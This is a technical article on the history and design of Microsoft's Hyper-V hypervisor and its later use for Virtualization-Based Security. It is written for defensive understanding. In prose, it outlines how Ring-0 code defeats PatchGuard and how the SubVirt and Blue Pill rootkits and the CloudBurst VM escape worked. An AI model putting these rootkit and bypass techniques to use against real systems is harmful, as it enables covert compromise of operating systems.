&lt;p&gt;Microsoft entered the virtualization market three years late and by acquisition. On February 19, 2003, the company bought Connectix, a small San Mateo software house founded in 1988 that had built Virtual PC for Macintosh and, later, Virtual PC for Windows. The Connectix engineers became the nucleus of what Microsoft would internally call the Windows Server Virtualization team. The acquired products shipped as Microsoft Virtual PC 2004 and Microsoft Virtual Server 2005. Both were Type-2 hypervisors -- user-mode applications that ran on top of Windows, using software techniques rather than CPU virtualization extensions, because the CPU virtualization extensions did not yet exist on shipping x86 hardware.&lt;/p&gt;

A hypervisor that runs directly on hardware rather than as an application on top of a host operating system. The hypervisor owns the CPU, the second-level page tables, and (in the security-relevant case) the IOMMU; guest operating systems run at a lower privilege level, in partitions or virtual machines that the hypervisor schedules and isolates. IBM&apos;s CP-67/CMS in 1968 is the genre&apos;s origin; VMware ESX, Xen, and the Microsoft hypervisor (`hvix64.exe`/`hvax64.exe`) are the modern examples [@wp-hypervisor].
&lt;p&gt;In 2005, the team began a new project under the codename &quot;Viridian.&quot; The goal was a Type-1 micro-kernelized hypervisor for x86-64 -- a fresh build, not a derivative of Virtual Server -- that required hardware virtualization extensions at install time. Intel&apos;s VT-x had shipped in November 2005 with the Pentium 4 662/672; AMD-V had shipped on May 23, 2006 with the Socket AM2 platform, initially available across Athlon 64 X2 and Athlon 64 FX and select Athlon 64 models. Both were now broadly enough deployed that Microsoft could make hardware virtualization a system requirement rather than a configuration option. Three years later, on June 26, 2008 (Wikipedia&apos;s body text gives this date; the infobox states June 28), Hyper-V reached RTM and was delivered as a Windows Server 2008 feature through Windows Update [@wp-hyperv].Microsoft ships two hypervisor binaries: &lt;code&gt;hvix64.exe&lt;/code&gt; for Intel hosts (using VT-x) and &lt;code&gt;hvax64.exe&lt;/code&gt; for AMD hosts (using AMD-V). The instruction-set-architecture divergence is real -- Intel uses &lt;code&gt;vmcall&lt;/code&gt; to enter the hypervisor; AMD uses &lt;code&gt;vmmcall&lt;/code&gt; -- but the hypercall ABI surface above that single instruction is identical, so the rest of the Microsoft hypervisor codebase is shared between the two binaries.&lt;/p&gt;
&lt;p&gt;The 2008 design choices are worth naming individually because the ones that mattered for &lt;em&gt;server consolidation&lt;/em&gt; turned out, twelve years later, to also be the ones that mattered for &lt;em&gt;security&lt;/em&gt;. Three deserve flagging:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Micro-kernelized architecture.&lt;/strong&gt; The hypervisor binary contains only the minimum machinery needed to virtualize the CPU, schedule VMs, and enforce memory isolation. It does not contain device drivers. It does not contain a network stack. It does not contain a filesystem.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Root partition plus child partitions.&lt;/strong&gt; From the Microsoft architecture documentation: &quot;&lt;em&gt;The Microsoft hypervisor must have at least one parent, or root, partition, running Windows. The virtualization management stack runs in the parent partition and has direct access to hardware devices. The root partition then creates the child partitions which host the guest operating systems&lt;/em&gt;&quot; [@ms-hyperv-architecture]. The root partition is a full Windows install; the child partitions are guest VMs.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;VMBus, VSP, and VSC.&lt;/strong&gt; Inter-partition I/O happens over the VMBus -- a paravirtualized message channel. A Virtualization Service Provider (VSP) runs in the root partition and owns the real device; a Virtualization Service Client (VSC) runs in each child partition and talks to the VSP over VMBus. Device emulation lives in the root partition&apos;s user-mode and kernel-mode code, &lt;em&gt;not in the hypervisor binary itself&lt;/em&gt;. This is the choice that, twelve years later, kept the hypervisor&apos;s Trusted Computing Base small enough to be defensible.&lt;/li&gt;
&lt;/ul&gt;

flowchart TD
    subgraph Root[&quot;Root partition (Windows Server)&quot;]
        RD[&quot;Real device drivers&quot;]
        VSP[&quot;Virtualization Service Providers&quot;]
        VMM[&quot;VM Worker Processes (vmwp.exe)&quot;]
    end
    subgraph Child1[&quot;Child partition 1 (guest OS)&quot;]
        VSC1[&quot;Virtualization Service Clients&quot;]
        Guest1[&quot;Guest kernel + apps&quot;]
    end
    subgraph Child2[&quot;Child partition 2 (guest OS)&quot;]
        VSC2[&quot;Virtualization Service Clients&quot;]
        Guest2[&quot;Guest kernel + apps&quot;]
    end
    HV[&quot;Microsoft Hypervisor (hvix64.exe / hvax64.exe)&quot;]
    HW[&quot;Hardware (CPU, RAM, NIC, disk)&quot;]
    Root -. VMBus .- Child1
    Root -. VMBus .- Child2
    Root --&amp;gt; HV
    Child1 --&amp;gt; HV
    Child2 --&amp;gt; HV
    HV --&amp;gt; HW
&lt;p&gt;The micro-kernel, root-plus-child, and VMBus choices were defensible &lt;em&gt;server&lt;/em&gt; engineering. Their server engineering rationale was that emulating a NIC, or a SCSI controller, or a graphics adapter inside a hypervisor binary would balloon the binary&apos;s size, lock its code-review cycles to those of every device the company shipped, and force the same security-critical code that scheduled CPUs to also handle Ethernet frame parsing. Putting device emulation in a normal Windows process inside the root partition -- the VM Worker Process &lt;code&gt;vmwp.exe&lt;/code&gt; -- meant the hypervisor binary could stay small enough to reason about.&lt;/p&gt;
&lt;p&gt;The 2008 design goal was, again, server consolidation. Microsoft&apos;s positioning materials at the time named &quot;run more VMs per box, get better hardware use&quot; as the customer pitch. Nothing in the 2008 Hyper-V documentation describes the hypervisor as a security primitive for the host OS. The security re-purposing -- the moment Hyper-V&apos;s hardware-privilege isolation became the way Windows itself protected its own kernel from itself -- did not arrive until 2015. To understand why it arrived at all, we have to back up thirty-four years to a 1974 paper that defined what virtualization formally requires.&lt;/p&gt;
&lt;h2&gt;3. The Theoretical Anchor -- Popek, Goldberg, and SLAT&lt;/h2&gt;
&lt;p&gt;Before Microsoft could build a hypervisor that ran security-critical code at a higher privilege than the Windows kernel, two unrelated decisions had to land. One was made in 1974, by two researchers who would never see Windows. The other was made in 2005, by Intel.&lt;/p&gt;
&lt;p&gt;In July 1974, Gerald Popek of UCLA and Robert Goldberg of Harvard published &quot;Formal Requirements for Virtualizable Third Generation Architectures&quot; in &lt;em&gt;Communications of the ACM&lt;/em&gt;. The paper laid down three properties any &quot;true&quot; virtual machine monitor must satisfy:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Equivalence.&lt;/strong&gt; Programs run on the VMM exhibit behavior essentially identical to behavior on the bare machine, except for differences due to timing and resource availability.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Resource control.&lt;/strong&gt; The VMM, not the guest, controls the system resources -- CPU time slices, memory, devices.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Efficiency.&lt;/strong&gt; A statistically dominant subset of the instruction stream executes directly on hardware, without VMM intervention.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The theorem that gave the paper its lasting reputation followed from those properties. Let a &lt;em&gt;sensitive instruction&lt;/em&gt; be one that either reads or modifies privileged state (the processor&apos;s mode bits, page-table base register, interrupt mask). Let a &lt;em&gt;privileged instruction&lt;/em&gt; be one that traps when executed in user mode. Then a sufficient condition for an ISA to be virtualizable is that every sensitive instruction is privileged. The intuition is simple: the VMM must get a chance to see -- and to handle -- every guest action that touches the machine&apos;s privileged state. If the CPU silently lets the guest do something privileged-feeling without trapping, the VMM cannot maintain equivalence and control simultaneously.&lt;/p&gt;

A property of a processor architecture: every sensitive instruction in the instruction set is privileged. An architecture with this property can be virtualized &quot;classically&quot; -- with a thin trap-and-emulate hypervisor whose only entry points are the traps the CPU raises on privileged-instruction violations. An architecture without this property requires software workarounds (binary translation, paravirtualization) or hardware extensions (VT-x, AMD-V) before a Popek-Goldberg-style VMM can be built.
&lt;p&gt;For three decades, x86 was famously &lt;em&gt;not&lt;/em&gt; virtualizable in the Popek-Goldberg sense. John Robin and Cynthia Irvine enumerated the problem in their 2000 USENIX Security paper: seventeen protected-mode instructions on the IA-32 architecture either read or modified privileged state without trapping from user mode.The Robin and Irvine enumeration includes instructions like &lt;code&gt;SGDT&lt;/code&gt; (store global descriptor table register), &lt;code&gt;SIDT&lt;/code&gt; (store interrupt descriptor table register), &lt;code&gt;SLDT&lt;/code&gt; (store local descriptor table register), &lt;code&gt;SMSW&lt;/code&gt; (store machine status word), and &lt;code&gt;PUSHF/POPF&lt;/code&gt; (push/pop flags including IOPL). Each of these silently returned or accepted privileged state from user mode without raising a fault. The aggregate effect was that no classical Popek-Goldberg VMM could correctly virtualize an unmodified x86 guest -- every one of those seventeen instructions was a hole the VMM could not see through. VMware Workstation, released in 1999 by VMware Inc. (which had been founded the year prior by Mendel Rosenblum, Diane Greene, Scott Devine, Ellen Wang, and Edouard Bugnion), worked around the problem with &lt;em&gt;binary translation&lt;/em&gt;: it dynamically rewrote each protected-mode guest instruction stream to substitute or trap the seventeen offenders. The technique imposed double-digit overhead, made debugging miserable, and was a security liability in its own right -- the binary translator itself was a parser of arbitrary attacker-controlled code.&lt;/p&gt;
&lt;p&gt;Intel and AMD ended the problem in hardware. Intel VT-x (codename Vanderpool, November 2005) and AMD-V (codename Pacifica, May 2006) added a new CPU mode -- &lt;em&gt;VMX root operation&lt;/em&gt; for Intel, &lt;em&gt;SVM host mode&lt;/em&gt; for AMD -- and a new instruction-emulation mechanism. A &lt;em&gt;VM exit&lt;/em&gt; could be configured to fire on every sensitive instruction the hypervisor wished to intercept, transferring control to the host with a structured exit reason and an opaque, host-controlled snapshot of guest state. After 2006, x86-64 became Popek-Goldberg-virtualizable in hardware [@wp-x86-virtualization].&lt;/p&gt;

sequenceDiagram
    participant Guest as Guest OS (VMX non-root)
    participant CPU as CPU hardware
    participant HV as Hypervisor (VMX root)
    Guest-&amp;gt;&amp;gt;CPU: MOV CR3, rax  (sensitive instr)
    CPU-&amp;gt;&amp;gt;HV: VM-EXIT (reason 28: CR access)
    HV-&amp;gt;&amp;gt;HV: Read VMCS exit-qualification
    HV-&amp;gt;&amp;gt;HV: Validate, emulate, update SLAT
    HV-&amp;gt;&amp;gt;CPU: VMRESUME
    CPU-&amp;gt;&amp;gt;Guest: Continue guest at next instruction
&lt;p&gt;One architectural element more was needed before any of this could be a &lt;em&gt;security&lt;/em&gt; primitive rather than just a virtualization primitive. Classical x86 paging maps a guest virtual address to a physical address through a single CPU-walked page table. In a virtualized system that single table cannot be enough, because the guest needs its own virtual-to-physical map and the host needs to remap the guest&apos;s &quot;physical&quot; address to a real machine-physical address. The first generations of VT-x simulated this two-level mapping in software through &lt;em&gt;shadow page tables&lt;/em&gt;, which the hypervisor had to maintain alongside the guest&apos;s tables on every page-table edit. Shadow paging was correct but slow, and it gave the hypervisor no clean way to enforce a &lt;em&gt;different&lt;/em&gt; memory map for different parts of the same guest.&lt;/p&gt;
&lt;p&gt;Second-Level Address Translation (SLAT) -- Intel&apos;s Extended Page Tables (EPT, shipped with Nehalem in November 2008) and AMD&apos;s Nested Page Tables (NPT, shipped with the Barcelona-generation Opteron on September 10, 2007) -- solved both problems in hardware. The guest walks its own page table from virtual to &quot;guest physical&quot;; the CPU then walks a second, hypervisor-owned page table from &quot;guest physical&quot; to &quot;system physical.&quot; Two key properties follow. First, the hypervisor has exclusive control of the second-level mapping; the guest cannot read, write, or even know that it exists. Second, because the second-level mapping is per-partition, the hypervisor can give two partitions different views of the same machine physical memory -- the same page can be readable in one partition and entirely absent in another.&lt;/p&gt;

A hardware feature on Intel (EPT) and AMD (NPT) CPUs that lets the hypervisor maintain a second page table mapping guest-physical addresses to system-physical addresses. The CPU walks the guest&apos;s own page table for the virtual-to-guest-physical mapping, then walks the hypervisor&apos;s table for the guest-physical-to-system-physical mapping. Because the second table is hypervisor-controlled and per-partition, the hypervisor can give different partitions -- and, in VBS, different Virtual Trust Levels inside the same partition -- different views of physical memory. SLAT is the bedrock of VTL memory protection [@ms-tlfs-pdf].
&lt;p&gt;Hyper-V required VT-x or AMD-V at install time from day one. Client Hyper-V has required SLAT since Windows 8; SLAT became a general Hyper-V requirement with Windows Server 2016 and Windows 10 1607 [@ms-hyperv-architecture].&lt;/p&gt;
&lt;p&gt;Popek and Goldberg gave us the property. Intel and AMD gave us the hardware. Microsoft used both to build a server hypervisor in 2008. But for the first seven years of Hyper-V&apos;s life, none of that machinery protected Windows from itself. Microsoft hadn&apos;t yet noticed the architectural problem that made it necessary -- or rather, they had noticed the problem (PatchGuard&apos;s bypass record was public) and had not yet conceded that the problem was structural. The concession came in 2015. What forced it was the same-privilege paradox.&lt;/p&gt;
&lt;h2&gt;4. The Same-Privilege Paradox -- Why PatchGuard Was Never Enough&lt;/h2&gt;
&lt;p&gt;PatchGuard, which Microsoft shipped in 2005 with Windows Server 2003 SP1 x64, ran inside &lt;code&gt;ntoskrnl.exe&lt;/code&gt; at Ring 0 and scanned a curated list of kernel structures -- the system service dispatch table, the interrupt descriptor table, the kernel image&apos;s &lt;code&gt;.text&lt;/code&gt; section -- at randomized intervals to detect tampering. It was bypassed within months by Skywing&apos;s &lt;em&gt;Uninformed&lt;/em&gt; writeups. Microsoft kept shipping it. Researchers kept bypassing it. The pattern lasted a decade. The reason is not that PatchGuard&apos;s authors were sloppy [@wp-kpp]. The reason is structural, and naming it correctly is the first of the three insights this article is built around.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Any defense reachable by &lt;code&gt;mov&lt;/code&gt; from Ring 0 is defeasible by &lt;code&gt;mov&lt;/code&gt; from Ring 0.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The intuition is simple. PatchGuard is a piece of code. It lives in the kernel&apos;s virtual address space at some page. It owns a timer that re-runs it periodically. It maintains a randomization seed for which structures it checks next. It has a callback path into &lt;code&gt;KeBugCheckEx&lt;/code&gt; if it detects tampering. Every one of those four assets -- the code page, the timer callback, the randomization seed, the bug-check path -- is a kernel data structure or a kernel virtual address. An attacker with Ring-0 code execution can locate each of them by searching the same kernel address space PatchGuard searches. They can patch the callback so the timer no-ops. They can patch the seed so the randomization is predictable. They can patch the bug-check path so it reports success. They can do all of this with a sequence of plain &lt;code&gt;mov&lt;/code&gt; instructions. PatchGuard cannot defend against this, because PatchGuard&apos;s defenses live in the same place its attacker&apos;s writes do.&lt;/p&gt;

PatchGuard and its attacker are colleagues, not adversaries. They share an office. The office is `ntoskrnl.exe`&apos;s virtual address space, and there is no key on the door.
&lt;p&gt;This is the &lt;em&gt;same-privilege paradox&lt;/em&gt;. It is not an implementation bug. It does not yield to better obfuscation, more randomization, or harder-to-find timers. It is an architectural ceiling. A defense at privilege level $P$ cannot be enforced against an attacker who also runs at privilege level $P$, because the defender&apos;s state lives in the attacker&apos;s address space. The defender can be made &lt;em&gt;expensive&lt;/em&gt; to find; it cannot be made impossible to find, because the attacker has the same instructions, the same address-space view, and the same MMU privileges as the defender.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The same-privilege paradox is a property of where the defense &lt;em&gt;lives&lt;/em&gt;, not of how clever the defense is. PatchGuard&apos;s authors did add randomization. They did add multiple decoy callbacks. They did add cryptographically derived integrity checks. None of those reductions changes the basic fact that the attacker, holding the same Ring-0 privilege, can locate and edit each of them. The architectural fix is not better PatchGuard. The architectural fix is moving the defender to a privilege level the attacker cannot reach.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Once the paradox is named, the defender&apos;s choice is binary. Either give up on having a defense at all -- treat Ring 0 as a free-fire zone where any malware that gets there has won -- or move the defender to a privilege level &lt;em&gt;above&lt;/em&gt; Ring 0, at a hardware boundary the attacker&apos;s &lt;code&gt;mov&lt;/code&gt; instructions cannot cross. Microsoft picked the second. It is the only architecturally honest choice.&lt;/p&gt;
&lt;p&gt;To make it work, Microsoft needed three things. The first was a hypervisor already deployed on every Windows install. They had that since 2008. The second was a way to put a piece of Windows itself -- code, data, secrets -- &lt;em&gt;inside&lt;/em&gt; the hypervisor&apos;s protection without spawning a separate VM, because spawning a separate VM doubles the system&apos;s resource cost and forces every Windows process to choose between living on the normal side or the secure side. That required an architectural idea that did not yet exist in 2010: a way to split a single partition into two privilege levels, each with its own SLAT mapping and its own register state. The third was a way to ensure the hypervisor itself could not be silently replaced or rolled back beneath the OS. That required a hardware-rooted measurement -- a DRTM event -- that the OS could attest to.&lt;/p&gt;
&lt;p&gt;The architectural idea is the subject of section 6. The DRTM measurement is the subject of section 11. Both of them required a decade-long conversation about whether the &lt;em&gt;hypervisor itself&lt;/em&gt; could be trusted at all -- a conversation that ran in parallel during the same years and that briefly seemed to argue the opposite case. We turn to that conversation next.&lt;/p&gt;
&lt;h2&gt;5. The Hyperjacking Era -- SubVirt, Blue Pill, and CloudBurst&lt;/h2&gt;
&lt;p&gt;While Microsoft was finishing Hyper-V, the security community was establishing that a hypervisor was not just a defense -- it was also the most powerful possible attacker against the OS sitting above it. Three demonstrations in three years made the point unmistakable.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;SubVirt.&lt;/strong&gt; In May 2006, Samuel King and Peter Chen at the University of Michigan, joined by Yi-Min Wang, Chad Verbowski, Helen Wang, and Jacob Lorch at Microsoft Research, presented &quot;SubVirt: Implementing Malware with Virtual Machines&quot; at IEEE S&amp;amp;P [@king-subvirt-2006]. Their construction was a &lt;em&gt;Virtual Machine Based Rootkit&lt;/em&gt; (VMBR). A privileged installer running inside a legitimate OS installed a malicious VMM at boot time; on the next reboot, the malicious VMM ran first, brought up the original OS as a guest underneath it, and gained the privileged position of seeing every CPU instruction, every memory access, and every I/O the OS performed. The original OS had no architectural way to tell it was no longer the most-privileged software on the box. SubVirt was demonstrated against Windows XP (using Microsoft Virtual PC as the malicious VMM substrate) and against Linux (using VMware Workstation), specifically to show that the technique was not tied to any one operating system or any one hypervisor product.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Blue Pill.&lt;/strong&gt; Three months later, at Black Hat USA 2006, Joanna Rutkowska of COSEINC demonstrated &quot;Subverting Vista Kernel for Fun and Profit&quot; [@wp-blue-pill]. Her tool, codenamed &lt;em&gt;Blue Pill&lt;/em&gt;, took a step beyond SubVirt by doing the VMM insertion at &lt;em&gt;runtime&lt;/em&gt; rather than at boot. The technique: a Ring-0 driver, running inside an already-booted Windows install on an AMD-V capable host, executed &lt;code&gt;VMRUN&lt;/code&gt; against an attacker-controlled Virtual Machine Control Block (VMCB) whose initial state matched the current physical CPU. The CPU dropped out of SVM root mode and re-entered as a guest under the attacker&apos;s VMM. The OS continued running normally, with no boot-loader modification and no reboot.&lt;/p&gt;
&lt;p&gt;By 2007, Rutkowska and Alexander Tereshkin returned to Black Hat USA with the more polished &quot;IsGameOver(,) Anyone?&quot; presentation, refining the technique and addressing the early critics&apos; detection ideas [@wp-blue-pill].Rutkowska&apos;s marketing claim that Blue Pill was &quot;100% undetectable&quot; attracted a public counter-effort: in 2007, Edgar Barbosa, Nate Lawson, Peter Ferrie, and Tom Ptacek all proposed detection techniques relying on side channels (timing artifacts of trapped instructions, TSC skew, structural differences in how &lt;code&gt;RDTSC&lt;/code&gt; behaves under VT-x). The claim softened in subsequent publications, but the underlying point survived: a hostile thin hypervisor below a victim OS can be made arbitrarily difficult to detect from inside that OS, and the only architecturally clean way to know what you are running under is to measure the boot chain before the OS starts.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;CloudBurst.&lt;/strong&gt; At Black Hat USA 2009, Kostya Kortchinsky of Immunity Inc. presented CLOUDBURST. It was the first publicly demonstrated arbitrary-code-execution guest-to-host escape against a commercial hypervisor: a heap overflow in VMware&apos;s emulated SVGA-II graphics adapter, tracked as CVE-2009-1244 [@nvd-cve-2009-1244]. A guest VM, executing entirely inside a VMware-managed user-mode process on the host, could overflow a buffer in that process and gain host code execution. CloudBurst&apos;s lasting operational lesson was not the specific bug but the &lt;em&gt;attack surface&lt;/em&gt;: device emulation -- not the trap-and-emulate core of the hypervisor -- is the largest piece of guest-attacker-controlled code in any commercial VMM. Every Hyper-V guest-to-host escape Microsoft has shipped a patch for since 2018 lands in either this device-emulation surface or the hypercall input-validation surface that mediates the same kinds of structured guest-controlled input.&lt;/p&gt;

flowchart TD
    subgraph Before[&quot;Before hyperjacking&quot;]
        OS1[&quot;Victim OS&quot;]
        FW1[&quot;Firmware (UEFI)&quot;]
        HW1[&quot;Hardware&quot;]
        OS1 --&amp;gt; FW1
        FW1 --&amp;gt; HW1
    end
    subgraph After[&quot;After hyperjacking&quot;]
        OS2[&quot;Victim OS (now a guest)&quot;]
        VMM[&quot;Hostile VMM (SubVirt / Blue Pill)&quot;]
        FW2[&quot;Firmware (UEFI)&quot;]
        HW2[&quot;Hardware&quot;]
        OS2 --&amp;gt; VMM
        VMM --&amp;gt; FW2
        FW2 --&amp;gt; HW2
    end
&lt;p&gt;The three demonstrations established a difficult dual truth. The hypervisor is the most powerful defender against an OS-level attacker, &lt;em&gt;and&lt;/em&gt; it is the most powerful attacker against an OS-level defender. The same primitive can play either role; which role it plays in any given system depends only on &lt;em&gt;whose&lt;/em&gt; hypervisor it is and whether the OS above it can prove that. SubVirt-style attacks did not require Microsoft to invent anything new -- they only had to be a possibility -- to force Microsoft into a design constraint: any &quot;hypervisor as security primitive&quot; architecture has to start by being &lt;em&gt;the only&lt;/em&gt; hypervisor on the box, with a measurement of the hypervisor binary recorded in a &lt;a href=&quot;https://paragmali.com/blog/the-tpm-in-windows-one-primitive-twenty-five-years-and-the-c/&quot; rel=&quot;noopener&quot;&gt;TPM platform configuration register&lt;/a&gt; so that any malicious VMBR underneath could be detected at attestation time. This is the role that System Guard Secure Launch (DRTM) plays in the architecture, and we will return to it in section 11.&lt;/p&gt;

Blue Pill (offense) and VBS (defense) are architecturally identical. Each is a thin Type-1 hypervisor that interposes between firmware and OS. Each owns the CPU&apos;s virtualization mode, the second-level page tables, and the IOMMU. Each is invisible to the OS unless the OS can prove what is underneath it. The only differences between them are whose hypervisor it is, whether it was measured at load time, and what it does with its privilege. The defense is the offense, run by the right people, in the right order, and attested to.
&lt;p&gt;By 2010 the security community had agreed: the hypervisor is the most powerful primitive in the system, and whoever owns the SLAT page tables owns the box. Joanna Rutkowska&apos;s Invisible Things Lab launched Qubes OS, an explicitly hypervisor-rooted security OS, on April 7, 2010 [@qubes-introducing-2010]. Microsoft owned the SLAT page tables. They had a hypervisor on every Windows install. They had a server-consolidation product. What they did not yet have was a &lt;em&gt;reason&lt;/em&gt; to re-purpose any of it for security. The reason was already being filed at the United States Patent and Trademark Office. The priority date was September 17, 2013.&lt;/p&gt;
&lt;h2&gt;6. The Pivot -- VSM, VTLs, and the Hepkin-Kishan Patent&lt;/h2&gt;
&lt;p&gt;On September 17, 2013, David Hepkin and Arun Kishan filed United States patent application 14/186,415, which would issue on August 30, 2016 as US Patent 9,430,642 B2 [@us9430642b2-patent]. The patent&apos;s title, &quot;Providing virtual secure mode with different virtual trust levels,&quot; reads like marketing now because the words it introduced -- &quot;Virtual Trust Level,&quot; &quot;VTL,&quot; &quot;Virtual Secure Mode&quot; -- became Microsoft&apos;s own canonical terminology. In 2013 the words did not exist. The patent describes, in 2013, exactly what Microsoft shipped twenty-two months later in Windows 10 build 10240 [@ms-tlfs-vsm].&lt;/p&gt;
&lt;p&gt;The patent&apos;s claim language is unusually specific. It teaches a virtual-machine manager that makes &quot;&lt;em&gt;multiple different virtual trust levels available to virtual processors of a virtual machine&lt;/em&gt;&quot;; it teaches that &quot;&lt;em&gt;different memory access protections (such as the ability to read, write, and/or execute memory) can be associated with different portions of memory (e.g., memory pages) for each virtual trust level&lt;/em&gt;&quot;; and it teaches that &quot;&lt;em&gt;the virtual trust levels are organized as a hierarchy with a higher level virtual trust level being more privileged than a lower virtual trust level.&lt;/em&gt;&quot; Each of those phrases is now a feature of the shipping Microsoft hypervisor.&lt;/p&gt;

A hypervisor-managed privilege level inside a single partition. Each VTL has its own SLAT mapping (so the same machine page can be readable in one VTL and absent in another), its own virtual-processor register state (so a VTL transition is a context switch, not a procedure call), and its own interrupt subsystem (so interrupts targeted at one VTL do not preempt code running in another). VTLs are hierarchical: a higher VTL can read all of a lower VTL&apos;s memory, but not vice versa. The shipping Microsoft hypervisor implements two VTLs (VTL0 = Normal world, VTL1 = Secure world); the architecture admits up to sixteen [@ms-tlfs-vsm].
&lt;p&gt;Windows 10 RTM on July 29, 2015, and Windows Server 2016, shipped VBS atop the &lt;em&gt;existing&lt;/em&gt; Hyper-V hypervisor [@wp-windows-10]. The architectural innovation -- the thing the patent was for -- was that VTL0 (Normal world, containing the NT kernel, user mode, and LSASS) and VTL1 (Secure world, containing the Secure Kernel and Isolated User Mode trustlets) ran &lt;em&gt;inside the same partition&lt;/em&gt; rather than in two separate partitions. VBS is not a second VM. It is a per-VTL SLAT split inside the root partition, plus a per-VTL register-state snapshot, plus a per-VTL interrupt delivery surface. The hypervisor switches SLAT contexts on VTL transitions, exactly as it would switch SLAT contexts on a partition switch -- but the switch happens inside a single partition&apos;s address space, so there is no extra VM scheduling and no extra OS image to manage.&lt;/p&gt;

flowchart TD
    subgraph Root[&quot;Root partition&quot;]
        subgraph VTL0[&quot;VTL0 -- Normal world&quot;]
            NT[&quot;NT kernel (ntoskrnl.exe)&quot;]
            User[&quot;User mode (lsass.exe, applications)&quot;]
        end
        subgraph VTL1[&quot;VTL1 -- Secure world&quot;]
            SK[&quot;Secure Kernel (securekernel.exe)&quot;]
            IUM[&quot;Isolated User Mode trustlets&quot;]
            LSAISO[&quot;LSAISO.EXE&quot;]
            VTPM[&quot;vTPM trustlet&quot;]
            IUM --- LSAISO
            IUM --- VTPM
        end
    end
    HV[&quot;Microsoft Hypervisor (hvix64 / hvax64)&quot;]
    HW[&quot;Hardware (CPU, RAM, IOMMU, TPM)&quot;]
    VTL0 -. &quot;Secure call (hypercall + SynIC)&quot; .-&amp;gt; VTL1
    VTL1 --&amp;gt; HV
    VTL0 --&amp;gt; HV
    HV --&amp;gt; HW
&lt;p&gt;The Hyper-V Top-Level Functional Specification, chapter 15, names the architectural facts verbatim. &quot;&lt;em&gt;VSM achieves and maintains isolation through Virtual Trust Levels (VTLs). VTLs are enabled and managed on both a per-partition and per-virtual processor basis.&lt;/em&gt;&quot; &quot;&lt;em&gt;Virtual Trust Levels are hierarchical, with higher levels being more privileged than lower levels.&lt;/em&gt;&quot; &quot;&lt;em&gt;Architecturally, up to 16 levels of VTLs are supported; however a hypervisor may choose to implement fewer than 16 VTL&apos;s. Currently, only two VTLs are implemented.&lt;/em&gt;&quot; The C-level definition &lt;code&gt;#define HV_NUM_VTLS 2&lt;/code&gt; is published in the same specification [@ms-tlfs-vsm]. Two VTLs are what ships; the architecture has room for more.&lt;/p&gt;

VSM enables operating system software in the root and guest partitions to create isolated regions of memory for storage and processing of system security assets. Access to these isolated regions is controlled and granted solely through the hypervisor, which is a highly privileged, highly trusted part of the system&apos;s Trusted Compute Base (TCB). -- Microsoft, *Hyper-V Top-Level Functional Specification*, chapter 15 [@ms-tlfs-vsm]
&lt;p&gt;This is the second insight the article is built around: VBS is not a re-architecture. It is a re-purposing. The hypervisor was already on every Windows install for unrelated reasons. The 2015 pivot did not require new hardware, new VMs, or new CPUs. It required a new way to &lt;em&gt;organize&lt;/em&gt; what was already there -- two SLAT mappings instead of one, two register snapshots instead of one, a secure-call ABI on top of the SynIC -- and a Windows-side Secure Kernel binary to run inside the new VTL1 view. The patent gave the design its formal expression; the engineering had been waiting since 2008 for the right architectural insight.David Hepkin spent over a decade on the NT kernel architecture team before the VSM design; Arun Kishan was an NT kernel architect and is now Microsoft&apos;s Corporate Vice President for the Operating Systems Platform group. Neither is a virtualization specialist by background. Their patent is, in retrospect, a kernel-team idea about how to put a piece of the kernel itself behind a hardware boundary the kernel cannot cross -- exactly the kind of design that an architect who had lived inside &lt;code&gt;ntoskrnl.exe&lt;/code&gt; for years would invent.&lt;/p&gt;
&lt;p&gt;Alex Ionescu&apos;s Black Hat USA 2015 deck &quot;Battle of SKM and IUM: How Windows 10 Rewrites OS Architecture&quot; reverse-engineered the entire VSM stack within four weeks of Windows 10 RTM [@ionescu-bh-2015]. The vocabulary Ionescu introduced has become the canonical research language for talking about VBS: VTL as &quot;synthetic ring level managed by the hypervisor&quot;; &lt;em&gt;trustlets&lt;/em&gt; for the user-mode processes that run inside VTL1&apos;s Isolated User Mode; Signature Level 12 plus the IUM EKU &lt;code&gt;1.3.6.1.4.1.311.10.3.37&lt;/code&gt; as the loader&apos;s signing requirement. Microsoft&apos;s own developer documentation now uses the same terms [@ms-iso-user-mode-trustlets].&lt;/p&gt;
&lt;p&gt;The pivot, then, was not a sudden re-architecture. It was the cash-out of a deliberate multi-year engineering plan that began at least twenty-two months before Windows 10 RTM. To see what VBS actually enforces -- and which hypervisor primitive backs each piece of that enforcement -- we need to walk the hypervisor&apos;s public surface. There are five surfaces. They are the architectural body of the article.&lt;/p&gt;
&lt;h2&gt;7. Architecture Tour -- The Hypervisor&apos;s Public Surface&lt;/h2&gt;
&lt;p&gt;What does the Windows hypervisor actually look like as a piece of software? It is a small kernel, on the order of one to two hundred thousand lines of C and C++ by community estimate; Microsoft has not published a primary line count. It has five externally visible surfaces, all of which are documented in the Hyper-V Top-Level Functional Specification (TLFS) v6.0b [@ms-tlfs-pdf]. We walk them in turn.&lt;/p&gt;
&lt;h3&gt;7.1 Partitions, VMBus, and the VSP/VSC pair&lt;/h3&gt;
&lt;p&gt;A &lt;em&gt;partition&lt;/em&gt; is the hypervisor&apos;s unit of isolation. From the Microsoft architecture page: &quot;&lt;em&gt;The Microsoft hypervisor must have at least one parent, or root, partition, running Windows. The virtualization management stack runs in the parent partition and has direct access to hardware devices. The root partition then creates the child partitions which host the guest operating systems&lt;/em&gt;&quot; [@ms-hyperv-architecture]. The root partition is a full Windows install with privileged hypercalls and direct access to hardware; each child partition is a guest VM with only the hardware the root has chosen to expose.&lt;/p&gt;
